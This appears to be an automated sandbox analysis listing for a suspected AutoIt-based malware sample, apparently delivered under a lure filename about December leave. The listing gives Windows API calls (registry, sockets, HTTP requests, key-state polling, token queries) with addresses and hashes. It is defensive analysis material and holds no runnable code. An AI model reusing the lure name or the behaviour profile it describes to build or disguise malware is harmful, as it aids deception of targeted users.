                                                        • Part of subcall function 00FC9DC5: VariantClear.OLEAUT32(?), ref: 00FC9E1A
                                                      Similarity
                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                      • API String ID: 4237274167-1221869570
                                                      • Opcode ID: 7c0128ba9fac3a1b75aee29fa1cf917c6e974a9262625627ac06281dc1c851f4
                                                      • Instruction ID: ba953e45ad62e5f6cc48fe3c089c81556cd4c2ff5191ecc97a0ba2e573e103e3
                                                      • Opcode Fuzzy Hash: 7c0128ba9fac3a1b75aee29fa1cf917c6e974a9262625627ac06281dc1c851f4
                                                      • Instruction Fuzzy Hash: E1917C71608301DFCB10EF64C885A9AB7E5BF89714F08482EF89A9B351DB35E905DB52
                                                      APIs
                                                        • Part of subcall function 00F9C6F4: _wcscpy.LIBCMT ref: 00F9C717
                                                      • _memset.LIBCMT ref: 00FC5438
                                                      • GetMenuItemInfoW.USER32(?), ref: 00FC5467
                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FC5513
                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FC553D
                                                      Similarity
                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                      • String ID: 0
                                                      • API String ID: 4152858687-4108050209
                                                      • Opcode ID: c8bf273c7cef395fd05c65756ba551c77d17b85fbb73d0a0bc90a1acac5ea8fe
                                                      • Instruction ID: cdc22346bc58cfbbc643f3a2e61cf3fea977b4fbdaff2ced56afb19c94e84307
                                                      • Opcode Fuzzy Hash: c8bf273c7cef395fd05c65756ba551c77d17b85fbb73d0a0bc90a1acac5ea8fe
                                                      • Instruction Fuzzy Hash: A45138729047029BD714DB28CA42FAB77E9AF95B64F080A2DF895C3190D774FCC4A752
                                                      APIs
                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FC027B
                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FC02B1
                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FC02C2
                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FC0344
                                                      Similarity
                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                      • String ID: DllGetClassObject
                                                      • API String ID: 753597075-1075368562
                                                      • Opcode ID: cfdb27f993317874fdb9b07827975ddead3e67061f31db27d6f621fc033d7407
                                                      • Instruction ID: e93fbec090eca8978b1cf1a41f08046410189e9e66eb75e9ed4155c71f655374
                                                      • Opcode Fuzzy Hash: cfdb27f993317874fdb9b07827975ddead3e67061f31db27d6f621fc033d7407
                                                      • Instruction Fuzzy Hash: 97419E71A04205EFDB05CF94C986F9A7BA9EF84310F1480ADA909DF246DBB5D942DBA0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00FC5075
                                                      • GetMenuItemInfoW.USER32 ref: 00FC5091
                                                      • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00FC50D7
                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01041708,00000000), ref: 00FC5120
                                                      Similarity
                                                      • API ID: Menu$Delete$InfoItem_memset
                                                      • String ID: 0
                                                      • API String ID: 1173514356-4108050209
                                                      • Opcode ID: 610581c3e2e63420ff5a73c941b310db390c7b183a2c46b62a9bb9344da454c4
                                                      • Instruction ID: 483ce19c6acb82ebcaf8f10342d7b0fd37e647e94cbe41271217ab8643f7da51
                                                      • Opcode Fuzzy Hash: 610581c3e2e63420ff5a73c941b310db390c7b183a2c46b62a9bb9344da454c4
                                                      • Instruction Fuzzy Hash: BC41D2716047029FD720DF24DD8AF6ABBE4AF89B24F08461EF89597281D734F844DB62
                                                      APIs
                                                      • CharLowerBuffW.USER32(?,?,?,?), ref: 00FE0587
                                                      Similarity
                                                      • API ID: BuffCharLower
                                                      • String ID: cdecl$none$stdcall$winapi
                                                      • API String ID: 2358735015-567219261
                                                      • Opcode ID: 3e829edf6fa7789723ea9ce13c08f06a095a99d3e573f6a0b70e7e980c934e69
                                                      • Instruction ID: ec1023b234ab5f2deca163e932acd593533f2b5584936b9626e417d92e9abb22
                                                      • Opcode Fuzzy Hash: 3e829edf6fa7789723ea9ce13c08f06a095a99d3e573f6a0b70e7e980c934e69
                                                      • Instruction Fuzzy Hash: 8631A130900656AFCF00EF64CC41AEEB3B4FF95314B108629E466AB3D1DB75E955DB90
                                                      APIs
                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FBB88E
                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FBB8A1
                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00FBB8D1
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 3850602802-1403004172
                                                      • Opcode ID: b28cb16db4144b4d9a05cb59b3b549cb945d7dde49e235f5befc90a84c63c6aa
                                                      • Instruction ID: 4672dae50181a959e710dcb522b027f1ea5866e452b2f6a980878858a21a212e
                                                      • Opcode Fuzzy Hash: b28cb16db4144b4d9a05cb59b3b549cb945d7dde49e235f5befc90a84c63c6aa
                                                      • Instruction Fuzzy Hash: C421F176900108BFDB14ABB5DC86DFE77BCDF45364B144129F061A71E0DBB98D0AAB60
                                                      APIs
                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FD4401
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00FD4427
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00FD4457
                                                      • InternetCloseHandle.WININET(00000000), ref: 00FD449E
                                                        • Part of subcall function 00FD5052: GetLastError.KERNEL32(?,?,00FD43CC,00000000,00000000,00000001), ref: 00FD5067
                                                      Similarity
                                                      • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                      • String ID:
                                                      • API String ID: 1951874230-3916222277
                                                      APIs
                                                        • Part of subcall function 00F9D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F9D1BA
                                                        • Part of subcall function 00F9D17C: GetStockObject.GDI32(00000011), ref: 00F9D1CE
                                                        • Part of subcall function 00F9D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F9D1D8
                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00FE915C
                                                      • LoadLibraryW.KERNEL32(?), ref: 00FE9163
                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00FE9178
                                                      • DestroyWindow.USER32(?), ref: 00FE9180
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                      • String ID: SysAnimate32
                                                      • API String ID: 4146253029-1011021900
                                                      APIs
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00FC9588
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FC95B9
                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00FC95CB
                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FC9605
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      APIs
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00FC9653
                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FC9683
                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00FC9694
                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FC96CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateHandle$FilePipe
                                                      • String ID: nul
                                                      • API String ID: 4209266947-2873401336
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 00FCDB0A
                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FCDB5E
                                                      • __swprintf.LIBCMT ref: 00FCDB77
                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,0101DC00), ref: 00FCDBB5
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                      • String ID: %lu
                                                      • API String ID: 3164766367-685833217
                                                      APIs
                                                        • Part of subcall function 00FBC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00FBC84A
                                                        • Part of subcall function 00FBC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00FBC85D
                                                        • Part of subcall function 00FBC82D: GetCurrentThreadId.KERNEL32 ref: 00FBC864
                                                        • Part of subcall function 00FBC82D: AttachThreadInput.USER32(00000000), ref: 00FBC86B
                                                      • GetFocus.USER32 ref: 00FBCA05
                                                        • Part of subcall function 00FBC876: GetParent.USER32(?), ref: 00FBC884
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00FBCA4E
                                                      • EnumChildWindows.USER32(?,00FBCAC4), ref: 00FBCA76
                                                      • __swprintf.LIBCMT ref: 00FBCA90
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                      • String ID: %s%d
                                                      • API String ID: 3187004680-1110647743
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00FE19F3
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00FE1A26
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00FE1B49
                                                      • CloseHandle.KERNEL32(?), ref: 00FE1BBF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                      • String ID:
                                                      • API String ID: 2364364464-0
                                                      APIs
                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00FEE1D5
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00FEE20D
                                                      • IsDlgButtonChecked.USER32(?,00000001), ref: 00FEE248
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 00FEE269
                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00FEE281
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$ButtonCheckedLongWindow
                                                      • String ID:
                                                      • API String ID: 3188977179-0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 00FC1CB4
                                                      • VariantClear.OLEAUT32(00000013), ref: 00FC1D26
                                                      • VariantClear.OLEAUT32(00000000), ref: 00FC1D81
                                                      • VariantClear.OLEAUT32(?), ref: 00FC1DF8
                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FC1E26
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Variant$Clear$ChangeInitType
                                                      • String ID:
                                                      • API String ID: 4136290138-0
                                                      APIs
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 00FE06EE
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00FE077D
                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00FE079B
                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00FE07E1
                                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 00FE07FB
                                                        • Part of subcall function 00F9E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00FCA574,?,?,00000000,00000008), ref: 00F9E675
                                                        • Part of subcall function 00F9E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00FCA574,?,?,00000000,00000008), ref: 00F9E699
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                      • String ID:
                                                      • API String ID: 327935632-0
                                                      APIs
                                                        • Part of subcall function 00FE3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00FE2BB5,?,?), ref: 00FE3C1D
                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00FE2EEF
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00FE2F2E
                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00FE2F75
                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00FE2FA1
                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00FE2FAE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                      • String ID:
                                                      • API String ID: 3740051246-0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00FD12B4
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00FD12DD
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00FD131C
  • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
  • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00FD1341
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00FD1349
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
APIs
• GetCursorPos.USER32(000000FF), ref: 00F9B64F
• ScreenToClient.USER32(00000000,000000FF), ref: 00F9B66C
• GetAsyncKeyState.USER32(00000001), ref: 00F9B691
• GetAsyncKeyState.USER32(00000002), ref: 00F9B69F
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
• GetWindowRect.USER32(?,?), ref: 00FBB369
• PostMessageW.USER32(?,00000201,00000001), ref: 00FBB413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FBB41B
• PostMessageW.USER32(?,00000202,00000000), ref: 00FBB429
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FBB431
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• IsWindowVisible.USER32(?), ref: 00FBDBD7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FBDBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FBDC2C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FBDC52
• _wcsstr.LIBCMT ref: 00FBDC5C
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FBBC90
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FBBCC2
• __itow.LIBCMT ref: 00FBBCDA
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FBBD00
• __itow.LIBCMT ref: 00FBBD11
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
APIs
  • Part of subcall function 00F850E6: _wcsncpy.LIBCMT ref: 00F850FA
• GetFileAttributesW.KERNEL32(?,?,?,?,00FC60C3), ref: 00FC6369
• GetLastError.KERNEL32(?,?,?,00FC60C3), ref: 00FC6374
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00FC60C3), ref: 00FC6388
• _wcsrchr.LIBCMT ref: 00FC63AA
  • Part of subcall function 00FC6318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,00FC60C3), ref: 00FC63E0
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
• String ID:
• API String ID: 3633006590-0
APIs
  • Part of subcall function 00FDA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00FDA84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00FD8BD3
• WSAGetLastError.WSOCK32(00000000), ref: 00FD8BE2
• connect.WSOCK32(00000000,?,00000010), ref: 00FD8BFE
Similarity
• API ID: ErrorLastconnectinet_addrsocket
• String ID:
• API String ID: 3701255441-0
APIs
• IsWindow.USER32(00000000), ref: 00FD8441
• GetForegroundWindow.USER32 ref: 00FD8458
• GetDC.USER32(00000000), ref: 00FD8494
• GetPixel.GDI32(00000000,?,00000003), ref: 00FD84A0
• ReleaseDC.USER32(00000000,00000003), ref: 00FD84DB
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F9AFE3
• SelectObject.GDI32(?,00000000), ref: 00F9AFF2
• BeginPath.GDI32(?), ref: 00F9B009
• SelectObject.GDI32(?,00000000), ref: 00F9B033
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
• __calloc_crt.LIBCMT ref: 00FA21A9
• CreateThread.KERNEL32(?,?,00FA22DF,00000000,?,?), ref: 00FA21ED
• GetLastError.KERNEL32 ref: 00FA21F7
• _free.LIBCMT ref: 00FA2200
• __dosmaperr.LIBCMT ref: 00FA220B
  • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
Similarity
• API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
• String ID:
• API String ID: 2664167353-0
APIs
• GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00FBABD7
• GetLastError.KERNEL32(?,00FBA69F,?,?,?), ref: 00FBABE1
• GetProcessHeap.KERNEL32(00000008,?,?,00FBA69F,?,?,?), ref: 00FBABF0
• HeapAlloc.KERNEL32(00000000,?,00FBA69F,?,?,?), ref: 00FBABF7
• GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00FBAC0E
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
                                                      APIs
                                                      • CLSIDFromProgID.OLE32 ref: 00FB9ADC
                                                      • ProgIDFromCLSID.OLE32(?,00000000), ref: 00FB9AF7
                                                      • lstrcmpiW.KERNEL32(?,00000000), ref: 00FB9B05
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00FB9B15
                                                      • CLSIDFromString.OLE32(?,?), ref: 00FB9B21
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7A74
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00FC7A82
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7A8A
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00FC7A94
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00FC7AD0
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FBAADA
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FBAAE4
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FBAAF3
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FBAAFA
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FBAB10
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FBAA79
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FBAA83
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FBAA92
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FBAA99
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FBAAAF
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FBEC94
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FBECAB
                                                      • MessageBeep.USER32(00000000), ref: 00FBECC3
                                                      • KillTimer.USER32(?,0000040A), ref: 00FBECDF
